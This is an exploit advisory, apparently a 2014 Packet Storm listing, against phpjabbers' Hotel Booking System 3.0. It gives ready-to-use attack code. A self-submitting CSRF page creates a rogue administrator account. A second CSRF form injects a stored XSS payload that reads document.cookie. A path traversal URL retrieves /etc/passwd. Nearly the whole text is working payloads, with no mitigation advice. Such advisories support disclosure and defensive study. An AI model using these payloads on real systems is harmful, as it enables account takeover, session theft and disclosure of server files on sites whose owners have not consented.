Hotel Booking System 3.0 CSRF / XSS / File Disclosure

2014-01-14T00:00:00
ID PACKETSTORM:124783
Type packetstorm
Reporter HackXBack
Modified 2014-01-14T00:00:00

Description

                                        
                                            `Hotel Booking System V3.0 - Multiple Vulnerabilties  
====================================================================  
  
####################################################################  
.:. Author : HackXBack  
.:. Contact : h-b@usa.com  
.:. Home : http://www.iphobos.com/blog/  
.:. Script : http://www.phpjabbers.com/hotels-booking-system/  
.:. Tested On Demo :  
http://www.phpjabbers.com/demo/hb_30/1389729077/index.php?controller=pjAdmin&action=pjActionLogin  
####################################################################  
  
===[ Exploit ]===  
  
[1] Cross Site Request Forgery  
==============================  
  
[Add Admin]  
  
<html>  
<body onload="document.form0.submit();">  
<form method="POST" name="form0" action="  
http://site/index.php?controller=pjAdminUsers&action=pjActionCreate">  
<input type="hidden" name="user_create" value="1"/>  
<input type="hidden" name="role_id" value="1"/>  
<input type="hidden" name="email" value="Email@hotmail.com"/>  
<input type="hidden" name="password" value="123456"/>  
<input type="hidden" name="name" value="Iphobos"/>  
<input type="hidden" name="status" value="T"/>  
</form>  
</body>  
</html  
  
[2] Cross Site Scripting  
========================  
  
# CSRF with XSS Exploit:  
  
  
<html>  
<body onload="document.form0.submit();">  
<form method="POST" name="form0"  
action="site/index.php?controller=pjAdminRooms&action=pjActionCreate">  
<input type="hidden" name="room_create" value="1"/>  
<input type="hidden" name="i18n[1][name]"  
value="<script>alert(document.cookie);</script>"/>  
<input type="hidden" name="i18n[3][name]" value=""/>  
<input type="hidden" name="i18n[2][name]" value=""/>  
<input type="hidden" name="i18n[1][description]" value="Iphobos"/>  
<input type="hidden" name="i18n[3][description]" value=""/>  
<input type="hidden" name="i18n[2][description]" value=""/>  
<input type="hidden" name="adults" value="1"/>  
<input type="hidden" name="children" value="0"/>  
<input type="hidden" name="cnt" value="1"/>  
</form>  
</body>  
</html>  
  
  
[3] Local File disclure  
========================  
  
http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../../../../etc/passwd  
  
####################################################################  
`